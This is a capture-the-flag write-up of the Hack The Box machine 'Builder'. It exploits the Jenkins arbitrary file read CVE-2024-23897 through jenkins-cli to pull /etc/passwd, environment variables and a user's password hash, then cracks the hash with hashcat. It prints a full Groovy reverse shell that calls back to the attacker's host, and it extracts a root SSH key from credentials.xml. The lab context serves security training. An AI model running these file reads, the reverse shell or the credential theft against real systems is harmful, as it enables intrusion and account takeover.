Builder - Hack The Box

Builder - Hack The Box

Joao Paulo Guedes's photo
Joao Paulo Guedes
·

9 min read

Table of contents

This is the write-up for the Builder machine from Hack The Box. This machine is based on the recent Jenkins Arbitrary File Read vulnerability noted on CVE-2024-23897.

Enumeration

We start executing a full port scan on the host.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder]
└──╼ [★]$ sudo nmap -v -sS -Pn -p- -oA nmap/allports --min-rate=300 --max-rate=500 10.10.11.10
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy

Now we execute a port scan only on the open ports found before.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder]
└──╼ [★]$ sudo nmap -vv -sV -sC -Pn -p 22,8080 -oA nmap/builder 10.10.11.10
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
8080/tcp open  http    syn-ack ttl 62 Jetty 10.0.18
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Dashboard [Jenkins]
|_http-server-header: Jetty(10.0.18)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We identified a Jenkins application running on port 8080 and accessing the application on the browser.

We execute a brute-force directory enumeration on the web server.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder]
└──╼ [★]$ gobuster dir -e -u "<http://10.10.11.10:8080/>" -w "/opt/SecLists/Discovery/Web-Content/raft-small-words.txt" -t 40 -o gobuster/builder_root_8080
<http://10.10.11.10:8080/login>                (Status: 200) [Size: 2220]                                                                                                                [5/129]
<http://10.10.11.10:8080/index>                (Status: 200) [Size: 14982]
<http://10.10.11.10:8080/search>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/search/>]
<http://10.10.11.10:8080/logout>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/>]
<http://10.10.11.10:8080/404>                  (Status: 200) [Size: 8581]
<http://10.10.11.10:8080/assets>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/assets/>]
<http://10.10.11.10:8080/api>                  (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/api/>]
<http://10.10.11.10:8080/error>                (Status: 400) [Size: 8354]
<http://10.10.11.10:8080/about>                (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/about/>]
<http://10.10.11.10:8080/log>                  (Status: 403) [Size: 595]
<http://10.10.11.10:8080/script>               (Status: 403) [Size: 601]
<http://10.10.11.10:8080/main>                 (Status: 500) [Size: 8619]
<http://10.10.11.10:8080/manage>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/manage/>]
<http://10.10.11.10:8080/>.                    (Status: 200) [Size: 14974]
<http://10.10.11.10:8080/widgets>              (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/widgets/>]
<http://10.10.11.10:8080/people>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/people/>]
<http://10.10.11.10:8080/exit>                 (Status: 405) [Size: 8745]
<http://10.10.11.10:8080/properties>           (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/properties/>]
<http://10.10.11.10:8080/me>                   (Status: 403) [Size: 593]
<http://10.10.11.10:8080/timeline>             (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/timeline/>]
<http://10.10.11.10:8080/oops>                 (Status: 200) [Size: 8583]
<http://10.10.11.10:8080/owner>                (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/owner/>]
<http://10.10.11.10:8080/secured>              (Status: 401) [Size: 0]
<http://10.10.11.10:8080/configure>            (Status: 403) [Size: 628]
<http://10.10.11.10:8080/computer>             (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/computer/>]
<http://10.10.11.10:8080/cloud>                (Status: 403) [Size: 599]
<http://10.10.11.10:8080/gc>                   (Status: 405) [Size: 8741]
<http://10.10.11.10:8080/computers>            (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/computers/>]
<http://10.10.11.10:8080/_script>              (Status: 403) [Size: 624]
<http://10.10.11.10:8080/eval>                 (Status: 405) [Size: 8745]
<http://10.10.11.10:8080/queue>                (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/queue/>]
<http://10.10.11.10:8080/cli>                  (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/cli/>]
<http://10.10.11.10:8080/builds>               (Status: 200) [Size: 36374]
<http://10.10.11.10:8080/exception>            (Status: 500) [Size: 8624]
<http://10.10.11.10:8080/i18n>                 (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/i18n/>]
<http://10.10.11.10:8080/_404>                 (Status: 200) [Size: 8585]
<http://10.10.11.10:8080/credentials>          (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/credentials/>]
<http://10.10.11.10:8080/reload>               (Status: 405) [Size: 8749]
<http://10.10.11.10:8080/j_security_check>     (Status: 303) [Size: 0] [--> <http://10.10.11.10:8080/loginError>]
<http://10.10.11.10:8080/restart>              (Status: 403) [Size: 603]
<http://10.10.11.10:8080/clouds>               (Status: 302) [Size: 0] [--> <http://10.10.11.10:8080/clouds/>]
Progress: 43007 / 43008 (100.00%)

We accessed the /cli endpoint and there we could download the jenkins-cli tool.

Exploitation

Searching for public exploits on the Web, we got the following recent CVE-2024-23897. We found the explanation about it here.

NVD - CVE-2024-23897

We executed that tool jenkins-cli passing the /etc/passwd file and we could read some lines of this file.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> help "@/etc/passwd"

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

Reading the /proc/self/environ file from the OS system we could obtain the path for Jenkins home directory noted in red below.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> -http help 1 "@/proc/self/environ"

ERROR: Too many arguments: HOSTNAME=0f52c222a4ccJENKINS_UC_EXPERIMENTAL=https://updates.jenkins.io/experimentalJAVA_HOME=/opt/java/openjdkJENKINS_INCREMENTALS_REPO_MIRROR=https://repo.jenkins-ci.org/incrementalsCOPY_REFERENCE_FILE_LOG=/var/jenkins_home/copy_reference_file.logPWD=/JENKINS_SLAVE_AGENT_PORT=50000JENKINS_VERSION=2.441HOME=/var/jenkins_homeLANG=C.UTF-8JENKINS_UC=https://updates.jenkins.ioSHLVL=0JENKINS_HOME=/var/jenkins_homeREF=/usr/share/jenkins/refPATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
java -jar jenkins-cli.jar help [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: 1)

We could read the full content of the files by changing the jenkins-cli command help to connect-node.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> -http connect-node "@/etc/passwd"
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin: No such agent "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" exists.
root:x:0:0:root:/root:/bin/bash: No such agent "root:x:0:0:root:/root:/bin/bash" exists.
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin: No such agent "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" exists.
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin: No such agent "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" exists.
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin: No such agent "_apt:x:42:65534::/nonexistent:/usr/sbin/nologin" exists.
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin: No such agent "nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin" exists.
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin: No such agent "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" exists.
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin: No such agent "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" exists.
bin:x:2:2:bin:/bin:/usr/sbin/nologin: No such agent "bin:x:2:2:bin:/bin:/usr/sbin/nologin" exists.
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin: No such agent "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" exists.
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin: No such agent "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" exists.
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin: No such agent "irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin" exists.
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin: No such agent "list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin" exists.
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash: No such agent "jenkins:x:1000:1000::/var/jenkins_home:/bin/bash" exists.
games:x:5:60:games:/usr/games:/usr/sbin/nologin: No such agent "games:x:5:60:games:/usr/games:/usr/sbin/nologin" exists.
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin: No such agent "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" exists.
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin: No such agent "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" exists.
sys:x:3:3:sys:/dev:/usr/sbin/nologin: No such agent "sys:x:3:3:sys:/dev:/usr/sbin/nologin" exists.
sync:x:4:65534:sync:/bin:/bin/sync: No such agent "sync:x:4:65534:sync:/bin:/bin/sync" exists.

Now we read the config.xml content file:

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]                                                                                                   [8/60]
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> -http connect-node "@/var/jenkins_home/config.xml"
  <primaryView>all</primaryView>: No such agent "  <primaryView>all</primaryView>" exists.                                                                                                    
  <label></label>: No such agent "  <label></label>" exists.                                                                                                                                  
  <clouds/>: No such agent "  <clouds/>" exists.                              
  <disabledAdministrativeMonitors/>: No such agent "  <disabledAdministrativeMonitors/>" exists.
  </authorizationStrategy>: No such agent "  </authorizationStrategy>" exists.
<hudson>: No such agent "<hudson>" exists.                                                     
    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>: No such agent "    <excludeClientIPFromCrumb>false</excludeClientIPFromCrumb>" exists.
    </hudson.model.AllView>: No such agent "    </hudson.model.AllView>" exists.
  </crumbIssuer>: No such agent "  </crumbIssuer>" exists.
  <disableRememberMe>false</disableRememberMe>: No such agent "  <disableRememberMe>false</disableRememberMe>" exists.
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">: No such agent "  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthoriz
ationStrategy">" exists.
  <viewsTabBar class="hudson.views.DefaultViewsTabBar"/>: No such agent "  <viewsTabBar class="hudson.views.DefaultViewsTabBar"/>" exists.
</hudson>: No such agent "</hudson>" exists.
  <numExecutors>2</numExecutors>: No such agent "  <numExecutors>2</numExecutors>" exists.
    <disableSignup>true</disableSignup>: No such agent "    <disableSignup>true</disableSignup>" exists.
      <properties class="hudson.model.View$PropertyList"/>: No such agent "      <properties class="hudson.model.View$PropertyList"/>" exists.
  </views>: No such agent "  </views>" exists.

... redacted

Searching for possible Jenkins’ sensitive files that we can read, we got the path of /users/users.xml. We could get the jennifer’s user directory.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> -http connect-node "@/var/jenkins_home/users/users.xml"
<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
      <string>jennifer_12108429903186576833</string>: No such agent "      <string>jennifer_12108429903186576833</string>" exists.
  <idToDirectoryNameMap class="concurrent-hash-map">: No such agent "  <idToDirectoryNameMap class="concurrent-hash-map">" exists.
    <entry>: No such agent "    <entry>" exists.
      <string>jennifer</string>: No such agent "      <string>jennifer</string>" exists.
  <version>1</version>: No such agent "  <version>1</version>" exists.
</hudson.model.UserIdMapper>: No such agent "</hudson.model.UserIdMapper>" exists.
  </idToDirectoryNameMap>: No such agent "  </idToDirectoryNameMap>" exists.
<hudson.model.UserIdMapper>: No such agent "<hudson.model.UserIdMapper>" exists.
    </entry>: No such agent "    </entry>" exists.

We read the config file for the jeniffer’s user and retrieve the user’s password hash:

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]                                                                                                         
└──╼ [★]$ java -jar jenkins-cli.jar -s <http://10.10.11.10:8080/> -http connect-node "@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml"                            
    <hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">: No such agent "    <hudson.tasks.Mailer_-UserProperty plugin="mailer@463.vedf8358e006b_">" exists.
    <hudson.search.UserSearchProperty>: No such agent "    <hudson.search.UserSearchProperty>" exists.                                                            
      <roles>: No such agent "      <roles>" exists.                                                                                                                                              <jenkins.security.seed.UserSeedProperty>: No such agent "    <jenkins.security.seed.UserSeedProperty>" exists.
      </tokenStore>: No such agent "      </tokenStore>" exists.                                                                                                                              
    </hudson.search.UserSearchProperty>: No such agent "    </hudson.search.UserSearchProperty>" exists.                    
      <timeZoneName></timeZoneName>: No such agent "      <timeZoneName></timeZoneName>" exists.                                                      
  <properties>: No such agent "  <properties>" exists.                                                                                                                                        
    <jenkins.security.LastGrantedAuthoritiesProperty>: No such agent "    <jenkins.security.LastGrantedAuthoritiesProperty>" exists.
      <flags/>: No such agent "      <flags/>" exists.

...
...

<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
  <fullName>jennifer</fullName>: No such agent "  <fullName>jennifer</fullName>" exists.
      <seed>6841d11dc1de101d</seed>: No such agent "      <seed>6841d11dc1de101d</seed>" exists.
  <id>jennifer</id>: No such agent "  <id>jennifer</id>" exists.
  <version>10</version>: No such agent "  <version>10</version>" exists.
      <tokenStore>: No such agent "      <tokenStore>" exists.
          <filterExecutors>false</filterExecutors>: No such agent "          <filterExecutors>false</filterExecutors>" exists.
    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>: No such agent "    <io.jenkins.plugins.thememanager.ThemeUserProperty plugin="theme-manager@215.vc1ff18d67920"/>" exists.
      <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>: No such agent "      <passwordHash>#jbcrypt:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a</passwordHash>" exists.

Checking the hash’s type, we were able to obtain the bcrypt type:

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ name-that-hash -t '$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a'

  _   _                           _____ _           _          _   _           _     
 | \\ | |                         |_   _| |         | |        | | | |         | |    
 |  \\| | __ _ _ __ ___   ___ ______| | | |__   __ _| |_ ______| |_| | __ _ ___| |__  
 | . ` |/ _` | '_ ` _ \\ / _ \\______| | | '_ \\ / _` | __|______|  _  |/ _` / __| '_ \\ 
 | |\\  | (_| | | | | | |  __/      | | | | | | (_| | |_       | | | | (_| \\__ \\ | | |
 \\_| \\_/\\__,_|_| |_| |_|\\___|      \\_/ |_| |_|\\__,_|\\__|      \\_| |_/\\__,_|___/_| |_|

<https://twitter.com/bee_sec_san>
<https://github.com/HashPals/Name-That-Hash> 


$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a

Most Likely 
bcrypt, HC: 3200 JtR: bcrypt
Blowfish(OpenBSD), HC: 3200 JtR: bcrypt Summary: Can be used in Linux Shadow Files.
Woltlab Burning Board 4.x,

Copying the hash to a file and using the hashcat tool to crack it, we got jennifer’s password in clear text.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ echo 'jennifer:$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a' > jennifer.hash
─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation]
└──╼ [★]$ hashcat -m 3200 jennifer.hash /usr/share/wordlists/rockyou.txt --username --force
hashcat (v6.2.6) starting

You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-haswell-Intel(R) Core(TM) i5-9600KF CPU @ 3.70GHz, 6921/13906 MB (2048 MB allocatable), 2MCU

...
...

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec

$2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 3200 (bcrypt $2*$, Blowfish (Unix))
Hash.Target......: $2a$10$UwR7BpEH.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQ.../L4l1a
Time.Started.....: Sat Feb 17 12:37:43 2024, (1 sec)
Time.Estimated...: Sat Feb 17 12:37:44 2024, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:       11 H/s (6.53ms) @ Accel:2 Loops:64 Thr:1 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8/14344385 (0.00%)
Rejected.........: 0/8 (0.00%)
Restore.Point....: 4/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:960-1024
Candidate.Engine.: Device Generator
Candidates.#1....: iloveyou -> rockyou
Hardware.Mon.#1..: Util: 63%

Started: Sat Feb 17 12:36:56 2024
Stopped: Sat Feb 17 12:37:44 2024
USERNAMEPASSWORD
jenniferprincess

We log into Jenkins as jennifer.

Now we go to the “Script Console” tool and insert our reverse shell.

String host="10.10.14.10";
int port=443;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Open a port on our attack machine and execute the reverse shell above.

Privilege Escalation

Searching on the machine, we check the credentials.xml file generated by Jenkins. We found the root’s private key.

(remote) jenkins@0f52c222a4cc:/var/jenkins_home$ cat credentials.xml 
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1319.v7eb_51b_3a_c97b_">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey plugin="ssh-credentials@308.ve4497b_ccd8f4">
          <scope>GLOBAL</scope>
          <id>1</id>
          <description></description>
          <username>root</username>
          <usernameSecret>false</usernameSecret>
          <privateKeySource class="com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey$DirectEntryPrivateKeySource">
            <privateKey>{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}</privateKey>
          </privateKeySource>
        </com.cloudbees.jenkins.plugins.sshcredentials.impl.BasicSSHUserPrivateKey>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

This key is encrypted. So we went to the Script Console tool on the Jenkins Webpage and executed the following.

We were able to decrypt and get the root’s SSH Key.

We copied the key to a file on our attack machine, gave it the right permissions, and logged into the SSH as root.

─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation/privesc]
└──╼ [★]$ vim root.key
─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation/privesc]
└──╼ [★]$ chmod 600 root.key 
─[us-vip-8]─[10.10.14.10]─[th3g3ntl3m4n@parrot]─[~/htb/machines/builder/exploitation/privesc]
└──╼ [★]$ ssh -i root.key root@10.10.11.10
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-94-generic x86_64)

 * Documentation:  <https://help.ubuntu.com>
 * Management:     <https://landscape.canonical.com>
 * Support:        <https://ubuntu.com/pro>

  System information as of Sat Feb 17 05:23:19 PM UTC 2024

  System load:              0.080078125
  Usage of /:               66.1% of 5.81GB
  Memory usage:             39%
  Swap usage:               0%
  Processes:                220
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.10.11.10
